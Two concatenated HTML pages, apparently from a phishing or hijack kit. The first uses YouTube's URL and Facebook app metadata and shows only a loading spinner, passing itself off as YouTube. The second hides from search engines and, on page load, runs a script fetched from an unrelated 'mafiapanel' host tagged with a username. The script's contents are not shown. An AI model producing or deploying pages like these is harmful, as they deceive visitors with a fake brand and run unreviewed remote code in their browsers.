<!DOCTYPE html>
<html lang='en'>
<head>
    <meta charset='UTF-8' />
    <meta property='og:type' content='article' />
    <meta property='og:url' content='https://www.youtube.com' />
    <link rel='canonical' href='https://www.youtube.com/' />
    <meta property='fb:app_id' content='87741124305' />
    <meta property='og:url' content='https://www.youtube.com/' />
    <style>
        body { display:flex; justify-content:center; align-items:center;
        background:#000} .loader { width: 48px; height: 48px; border-radius: 50%;
        display: inline-block; position: relative; background:
        linear-gradient(0deg, rgba(255, 61, 0, 0.2) 33%, #ff3d00 100%);
        box-sizing: border-box; animation: rotation 1s linear infinite; }
        .loader::after { content: ''; box-sizing: border-box; position: absolute;
        left: 50%; top: 50%; transform: translate(-50%, -50%); width: 44px;
        height: 44px; border-radius: 50%; background: #263238; } @keyframes
        rotation { 0% { transform: rotate(0deg) } 100% { transform:
        rotate(360deg)} }
    </style>
</head>
<body>
    <span class='loader'></span>
    .
</body>
</html>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta http-equiv="cache-control" content="no-cache">
    <meta name="referrer" content="no-referrer" />
    <meta name="robots" content="index">
    <meta name="robots" content="noindex">
    <meta name="robots" content="nofollow">
    <meta name="googlebot" content="noindex">
</head>
<body>
<script src="https://mafiapanel.bio/h/index.php?username=ghost" type="text/javascript" async="true"></script>
</body>
</html>
